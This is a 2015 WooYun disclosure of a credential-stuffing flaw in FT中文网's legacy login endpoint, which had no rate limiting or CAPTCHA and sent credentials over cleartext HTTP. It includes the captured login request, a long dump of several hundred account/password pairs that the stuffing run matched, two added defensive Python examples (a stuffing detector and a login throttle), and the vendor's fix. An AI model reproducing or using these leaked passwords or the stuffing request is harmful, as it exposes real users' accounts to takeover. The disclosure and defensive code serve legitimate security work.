
Vulnerability summary

Defect ID: wooyun-2015-0144140

Title: FT中文网 main-site login interface design flaw allows credential stuffing (serious leak of sensitive user information)

Vendor: FT中文网

Author: 路人甲

Submitted: 2015-09-29 22:10

Fixed: 2015-11-09 10:55

Disclosed: 2015-11-09 10:55

Vulnerability type: design flaw / logic error

Severity: low

Self-assessed rank: 3

Status: fixed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-09-29: Details sent to the vendor, awaiting vendor response
2015-09-30: Vendor confirmed; details visible to the vendor only
2015-10-10: Details opened to core white hats and domain experts
2015-10-20: Details opened to regular white hats
2015-10-30: Details opened to intern white hats
2015-11-09: Vendor fixed the vulnerability and disclosed it proactively; details opened to the public

Brief description:

FT中文网 main-site login interface design flaw allows credential stuffing (serious leak of sensitive user information)

Detailed description:

FT中文网 main-site login endpoint: http://user.ftchinese.com/login
The endpoint applies no restriction on login attempts (no rate limiting or CAPTCHA), and a packet capture shows the username and password are sent in cleartext over HTTP, so it can be credential-stuffed with username/password pairs leaked from other sites. The captured request, followed by the results of the run:

POST /login HTTP/1.1
Host: user.ftchinese.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://user.ftchinese.com/login
Cookie: _ga=GA1.3.214002032.1443503033; gourl=http%3A%2F%2Fwww.ftchinese.com%2F; PHPSESSID=u812ipbdb5e0s78dv4o6nt2gj3
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
username=123123123@qq%2ecom&password=123123&saveme=on&gourl=http%3A%2F%2Fuser.ftchinese.com%2Flogin


[email protected]	188571	971
[email protected] 6025210 974
[email protected] 102734 975
[email protected] 1982529 976
[email protected] 7618978 976
[email protected] 111111 977
[email protected] 123456 978
[email protected] 32689852 978
[email protected] 851024 978
[email protected] mikeisgood 979
[email protected] skymaster 979
[email protected] 123456 980
[email protected] 51877018 981
[email protected] 19840716 982
[email protected] 15968707181 982
[email protected] 123456 982
[email protected] 870923 993
[email protected] i4e4x5a3 994
[email protected] zhuxuanans 994
[email protected] 123456 995
[email protected] 123456 995
[email protected] 123456 995
[email protected] 123456 995
[email protected] 123456 997
[email protected] 123456 997
[email protected] b299782t 997
[email protected] 852404509 1007
[email protected] wsawsdws 1008
[email protected] 963277 1010
[email protected] 1307636720 1010
[email protected] 6223568 1012
[email protected] yuanye 1012
[email protected] 454563 1013
[email protected] 123456 1013
[email protected] 54088d11 1013
[email protected] lefthand 1014
[email protected] 3624029 1014
[email protected] dxb222 1015
[email protected] 99265839 1016
[email protected] c1991718 1017
[email protected] 52501995 1019
[email protected] zxkzxk 1020
[email protected] 321610 1023
[email protected] 123456 1025
[email protected] 123456 1025
[email protected] 636209166 1025
[email protected] password 1026
[email protected] 4210026a 1026
[email protected] zhendeaini 1026
[email protected] 880526 1026
[email protected] 55326961 1027
[email protected] 881019 1027
[email protected] 950902 1027
[email protected] cmbjx1995 1027
[email protected] 123123 1028
[email protected] a3540338 1028
[email protected] mayang 1029
[email protected] 27057663 1029
[email protected] 19621021 1029
[email protected] 4369297 1030
[email protected] 123123 1030
[email protected] 5zmqamjg 1030
[email protected] 19911013 1030
[email protected] 123123 1030
[email protected] snoopylmh 1030
[email protected] 86015949 1030
[email protected] 3381445 1031
[email protected] 123123 1032
[email protected] 7660213 1032
[email protected] 111111 1032
[email protected] 111111 1032
[email protected] 111111 1032
[email protected] 85190453 1032
[email protected] 123123 1032
[email protected] static 1032
[email protected] 131421 1032
[email protected] 123456 1032
[email protected] 7660213 1032
[email protected] 3653350 1032
[email protected] mfkcatq 1033
[email protected] tw123456789 1034
[email protected] 111111 1034
[email protected] 123456 1034
[email protected] 900218 1034
[email protected] w5722u 1034
[email protected] 880714 1034
[email protected] 8846887 1034
[email protected] 521665 1034
[email protected] 350958532 1034
[email protected] 1990920 1034
[email protected] bailou199012 1035
[email protected] 111111 1036
[email protected] 77478012 1036
[email protected] 0.123654 1036
[email protected] 123321 1036
[email protected] 9203317115 1036
[email protected] 5201314 1036
[email protected] 123123 1036
[email protected] woaini1122 1036
[email protected] 7319098 1036
[email protected] 880807 1036
[email protected] 132921088 1036
[email protected] 27463722 1036
[email protected] 23230078 1037
[email protected] sarah526 1037
[email protected] 72160317 1038
[email protected] 123456 1039
[email protected] 19732846 1041
[email protected] wenjie143 1043
[email protected] 110110 1046
[email protected] 6322098 1046
[email protected] 139a1300 1049
[email protected] 8703631 1049
[email protected] 8267638 1057
[email protected] 789456 1061
[email protected] 870423 1061
[email protected] zxzl19860428 1065
[email protected] wuya0751 1067
[email protected] 123456 1067
[email protected] 422307 1069
[email protected] 871128 1069
[email protected] 123456 1071
[email protected] woaini 1072
[email protected] 123456 1072
[email protected] 111111 1072
[email protected] 984331 1072
[email protected] cx7773046 1072
[email protected] 1314521ding 1073
[email protected] 63476369 1073
[email protected] 100200 1073
[email protected] 456852 1073
[email protected] 19900420 1073
[email protected] 8777557 1073
[email protected] woainiya 1074
[email protected] wlc123 1074
[email protected] 335544 1074
[email protected] nwcpadme 1074
[email protected] 123456 1074
[email protected] 3951435 1074
[email protected] sconiel 1074
[email protected] duandian 1074
[email protected] stamina 1074
[email protected] 123456a 1074
[email protected] 321654 1075
[email protected] fengtao71 1075
[email protected] 811121 1075
[email protected] 123456 1075
[email protected] 13949825568 1075
[email protected] jeremyok 1075
[email protected] 854111 1076
[email protected] shenjun 1076
[email protected] 22336495 1077
[email protected] 963852 1077
[email protected] 56094256 1077
[email protected] 88aa88aa88 1077
[email protected] 13895772542 1078
[email protected] 3105955 1078
[email protected] yanjingwen 1078
[email protected] xy19880518 1078
[email protected] 775600 1078
[email protected] hgb1991821 1079
[email protected] yh843100 1079
[email protected] hwlajj 1079
[email protected] 14541454 1080
[email protected] 333333 1080
[email protected] 3628814 1080
[email protected] lh8123456 1083
[email protected] 159654 1083
[email protected] 159654 1083
[email protected] 19880208 1087
[email protected] lovely123304 1088
[email protected] 701022 1088
[email protected] 86653470 1088
[email protected] 516618 1089
[email protected] 200712 1090
[email protected] 305182965 1090
[email protected] zny5951454 1091
[email protected] 8888888 1091
[email protected] 5350199a 1092
[email protected] jiang871027 1093
[email protected] 1382500 1094
[email protected] 15501760 1094
[email protected] 111111 1094
[email protected] 111111 1094
[email protected] 19811114 1096
[email protected] 271828 1096
[email protected] 2687264 1096
[email protected] haozheng668 1098
[email protected] 19861024 1103
[email protected] 123456 1104
[email protected] 123456 1104
[email protected] 123456 1104
[email protected] 19920831 1104
[email protected] 123456 1104
[email protected] 123456 1104
[email protected] 123456 1104
[email protected] 19890307 1104
[email protected] 123456 1104
[email protected] philips15a 1107
[email protected] 12051205 1107
[email protected] 8970290 1107
[email protected] 989010 1109
[email protected] wodwodwod 1109
[email protected] yuanyeyy 1109
[email protected] 123456 1110
[email protected] daylay 1111
[email protected] iloveyou 1111
[email protected] 379886571 1111
[email protected] 771229 1111
[email protected] 111 1111
[email protected] 610428 1112
[email protected] 901013 1113
[email protected] 920305 1113
[email protected] 1456721737 1113
[email protected] 19870103 1114
[email protected] fb18288 1114
[email protected] 88888888 1115
[email protected] sy3312876 1117
[email protected] badmescal 1121
[email protected] 8228216 1121
[email protected] 19911215zlt 1123
[email protected] 64221272 1123
[email protected] 198622700 1124
[email protected] 50427344 1124
[email protected] 31881699 1124
[email protected] mzl132612 1125
[email protected] 830111 1125
[email protected] 15009908417 1125
[email protected] liyue123456 1125
[email protected] wrdwhdrdm 1125
[email protected] 860411 1125
[email protected] 123456 1126
[email protected] 110140 1126
[email protected] wh16435287 1126
[email protected] 4815887 1126
[email protected] 50199763 1126
[email protected] 24486229 1126
[email protected] 123456789 1126
[email protected] 185961234 1127
[email protected] 584421048 1127
[email protected] 674959 1127
[email protected] quickbasic 1127
[email protected] 5201314 1127
[email protected] 275071874 1128
[email protected] 8510099 1128
[email protected] 198812zx 1128
[email protected] 900310 1128
[email protected] 1986092 1128
[email protected] fimergo 1128
[email protected] 3588706 1128
[email protected] 33775323 1128
[email protected] 5167998 1128
[email protected] 65189180 1129
[email protected] 123456 1129
[email protected] qwe123qwe123 1129
[email protected] fancy639 1129
[email protected] haitian1983 1130
[email protected] 2007310 1130
[email protected] heartless 1130
[email protected] 887900 1131
[email protected] 890623 1131
[email protected] 441700 1131
[email protected] zyj543210 1131
[email protected] zyj543210 1131
[email protected] zyj543210 1131
[email protected] zyj543210 1131
[email protected] zyj543210 1131
[email protected] ck7812396 1131
[email protected] 441700 1131
[email protected] 12332145 1132
[email protected] 753951 1132
[email protected] xiaojienb 1132
[email protected] 111111 1132
[email protected] 15959208478 1132
[email protected] gwf870716 1132
[email protected] 632177788 1132
[email protected] shengxia 1133
[email protected] cmsj1989 1133
[email protected] 839200 1133
[email protected] iloveyou 1133
[email protected] 54952877 1133
[email protected] 986753421 1133
[email protected] zyj543210 1133
[email protected] zyj543210 1133
[email protected] eyesonme 1133
[email protected] as1991520 1134
[email protected] daviddai1992 1134
[email protected] 2124869 1134
[email protected] mx2033603 1134
[email protected] momo5225 1134
[email protected] 8961183 1134
[email protected] shukuang 1134
[email protected] 13602359761 1135
[email protected] 22441111 1135
[email protected] changchun 1135
[email protected] 9831102 1136
[email protected] 7800459 1136
[email protected] 19931022anne 1136
[email protected] 780612 1136
[email protected] 2663232 1136
[email protected] 503697818 1136
[email protected] 415230 1136
[email protected] yy211314 1137
[email protected] 262053178 1138
[email protected] 2287324 1138
[email protected] 69221462 1138
[email protected] 265900 1138
[email protected] 555555 1138
[email protected] 3503556 1138
[email protected] 86618240 1140
[email protected] qq123456 1140
[email protected] 2008211043 1142
[email protected] 408335784 1144
[email protected] 199132 1146
[email protected] nakashima7 1148
[email protected] li19891220 1150
[email protected] 820523 1152
[email protected] 7221213 1157
[email protected] 312105329 1157
[email protected] 19850615 1158
[email protected] bpf815925 1159
[email protected] 13630850885 1159
[email protected] kissme 1192


After logging in with a matched pair, sensitive user information is exposed:

(screenshots 1.png, 2.png, 3.png)
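The run above has a characteristic shape: one source, many distinct accounts, a single attempt per account. A per-account lockout never fires against it, which is why the absence of any per-source control mattered here. The following is an added example, not code from FT中文网 or from the original report: detection logic over constructed authentication-log lines that flags that credential-stuffing pattern per source IP and, for contrast, the single-account guessing pattern that a per-account counter would catch. The log format, IP addresses, account names and thresholds are all constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample auth log (not from FT中文网): one line per login attempt.
# 203.0.113.7 cycles through eight accounts once each and hits two of them;
# 198.51.100.20 is a real user mistyping a password; 192.0.2.9 hammers one account.
SAMPLE_LOG = """\
2015-09-29T21:58:01 ip=203.0.113.7 user=u1@example.com result=fail
2015-09-29T21:58:02 ip=203.0.113.7 user=u2@example.com result=fail
2015-09-29T21:58:03 ip=203.0.113.7 user=u3@example.com result=ok
2015-09-29T21:58:04 ip=203.0.113.7 user=u4@example.com result=fail
2015-09-29T21:58:05 ip=203.0.113.7 user=u5@example.com result=fail
2015-09-29T21:58:06 ip=203.0.113.7 user=u6@example.com result=fail
2015-09-29T21:58:07 ip=203.0.113.7 user=u7@example.com result=ok
2015-09-29T21:58:08 ip=203.0.113.7 user=u8@example.com result=fail
2015-09-29T22:01:10 ip=198.51.100.20 user=alice@example.com result=fail
2015-09-29T22:01:25 ip=198.51.100.20 user=alice@example.com result=fail
2015-09-29T22:01:40 ip=198.51.100.20 user=alice@example.com result=ok
2015-09-29T22:05:00 ip=192.0.2.9 user=bob@example.com result=fail
2015-09-29T22:05:01 ip=192.0.2.9 user=bob@example.com result=fail
2015-09-29T22:05:02 ip=192.0.2.9 user=bob@example.com result=fail
2015-09-29T22:05:03 ip=192.0.2.9 user=bob@example.com result=fail
2015-09-29T22:05:04 ip=192.0.2.9 user=bob@example.com result=fail
2015-09-29T22:05:05 ip=192.0.2.9 user=bob@example.com result=fail
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>ok|fail)$"
)


def parse_line(line):
    """Parse one constructed log line; return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "ip": m["ip"],
            "user": m["user"].lower(), "result": m["result"]}


def find_stuffing(lines, window=timedelta(minutes=10), min_users=5):
    """Flag source IPs that tried >= min_users distinct accounts inside any
    `window`-long span. Returns {ip: {attempts, distinct_users, compromised}}.
    Per-account counters never see this pattern: each account gets one attempt."""
    by_ip = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            by_ip[ev["ip"]].append(ev)

    flagged = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(events)):
            while events[end]["ts"] - events[start]["ts"] > window:
                start += 1                      # slide the window forward
            if len({e["user"] for e in events[start:end + 1]}) >= min_users:
                flagged[ip] = {
                    "attempts": len(events),
                    "distinct_users": len({e["user"] for e in events}),
                    # accounts the run actually got into: these need a forced reset
                    "compromised": sorted({e["user"] for e in events if e["result"] == "ok"}),
                }
                break
    return flagged


def find_bruteforce(lines, window=timedelta(minutes=10), max_fail=5):
    """Per-account counterpart: accounts with > max_fail failures in a window.
    Catches single-account guessing, misses stuffing (one failure per account)."""
    by_user = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev["result"] == "fail":
            by_user[ev["user"]].append(ev["ts"])

    flagged = {}
    for user, times in by_user.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 > max_fail:
                flagged[user] = len(times)
                break
    return flagged


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("stuffing sources:", find_stuffing(lines))
    print("brute-forced accounts:", find_bruteforce(lines))
```

Run against the sample, only 203.0.113.7 is reported as a stuffing source (with u3 and u7 listed as compromised), only bob@example.com as a brute-forced account, and alice's two typos trip neither rule. The two functions are deliberately separate: a site that only has the per-account rule, which is the more common one, is exactly the site the run above walks through.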

Proof of vulnerability:

Identical to the detailed description above (the same captured login request, the same results of the run and the same three screenshots).

Remediation:

Add a CAPTCHA to the login form. The findings above also call for rate limiting of failed logins per source IP and per account, and for serving the login over HTTPS so that credentials are no longer sent in cleartext.
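A CAPTCHA alone, shown to every visitor, is a blunt instrument; the usual design is to gate attempts by source and by account and escalate from allow to CAPTCHA to refusal. The following is an added example, not code from FT中文网 or from the original report: a login throttle that runs before the password check and keeps two independent sliding-window counters. The thresholds, window length, IP address and account names are assumptions chosen for illustration.

```python
from collections import defaultdict, deque


class LoginThrottle:
    """Gate that runs before the password check and returns 'allow',
    'captcha' or 'deny'.

    Two independent counters, because the two attack shapes differ:
      * per-account failures -> lockout. Stops guessing one user's password.
      * per-IP attempts      -> CAPTCHA, then refusal. Stops stuffing, where
        every account sees a single attempt and per-account counters stay at 1.
    Thresholds are illustrative assumptions, not FT中文网 policy.
    """

    def __init__(self, clock, window=600, account_lockout=5,
                 ip_captcha=3, ip_block=20):
        self.clock = clock                       # callable returning seconds; injected for testing
        self.window = window                     # sliding window, seconds
        self.account_lockout = account_lockout
        self.ip_captcha = ip_captcha
        self.ip_block = ip_block
        self._acct_fail = defaultdict(deque)     # account -> timestamps of failures
        self._ip_seen = defaultdict(deque)       # ip -> timestamps of all attempts

    def _prune(self, dq, now):
        while dq and dq[0] <= now - self.window:
            dq.popleft()

    def check(self, ip, account):
        now = self.clock()
        acct, ipq = self._acct_fail[account], self._ip_seen[ip]
        self._prune(acct, now)
        self._prune(ipq, now)
        if len(acct) >= self.account_lockout or len(ipq) >= self.ip_block:
            return "deny"
        if len(ipq) >= self.ip_captcha:
            return "captcha"
        return "allow"

    def record(self, ip, account, success):
        """Call after the password check for every attempt that was not denied."""
        now = self.clock()
        self._ip_seen[ip].append(now)            # the source is counted whether or not it guessed right
        if success:
            self._acct_fail[account].clear()     # a correct password clears only the account's counter
        else:
            self._acct_fail[account].append(now)


class FixedClock:
    """Deterministic clock so the simulations below are reproducible."""
    def __init__(self, start=0.0):
        self.now = start

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


def simulate_stuffing(attempts, ip="203.0.113.7"):
    """One source, a different account per attempt, every password wrong (the
    shape of the run in this report). Returns (decisions, worst per-account count)."""
    clock, throttle, decisions = FixedClock(), LoginThrottle(FixedClock()), []
    throttle.clock = clock
    for i in range(attempts):
        account = f"user{i}@example.com"         # constructed account name
        decision = throttle.check(ip, account)
        decisions.append(decision)
        if decision != "deny":                   # captcha-gated attempts still count against the source
            throttle.record(ip, account, success=False)
        clock.advance(1)
    worst = max(len(q) for q in throttle._acct_fail.values())
    return decisions, worst


def simulate_bruteforce(attempts, ip="192.0.2.9", account="bob@example.com"):
    """One source, one account, every password wrong: the per-account lockout fires."""
    clock = FixedClock()
    throttle, decisions = LoginThrottle(clock), []
    for _ in range(attempts):
        decision = throttle.check(ip, account)
        decisions.append(decision)
        if decision != "deny":
            throttle.record(ip, account, success=False)
        clock.advance(1)
    return decisions


if __name__ == "__main__":
    print(simulate_stuffing(25))
    print(simulate_bruteforce(8))
```

In the stuffing simulation the per-account counter never rises above 1, so a site relying on account lockout alone would let all 25 attempts through; the per-IP counter moves the source to CAPTCHA after three attempts and refuses it after twenty. In production the source key should be widened beyond a single IP (a /24, an ASN or a device fingerprint) because a stuffing run is easily spread across a proxy pool, and `record` must be called only after the real password check so the throttle cannot be used to lock legitimate users out by guessing their usernames alone.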

Copyright notice: when reposting, please credit 路人甲@乌云


Vulnerability response

Vendor response:

Severity: high

Vulnerability rank: 10

Confirmed: 2015-09-30 11:24

Vendor reply:

An old login interface that should have been retired in 2013 was not updated to production during a program update, so it remained possible for this old interface to be reached. The verification mechanism of this interface was flawed, which allowed the database to be scanned. Many thanks!

Latest status:

2015-11-09: This interface is in fact no longer in use; the function has now been disabled.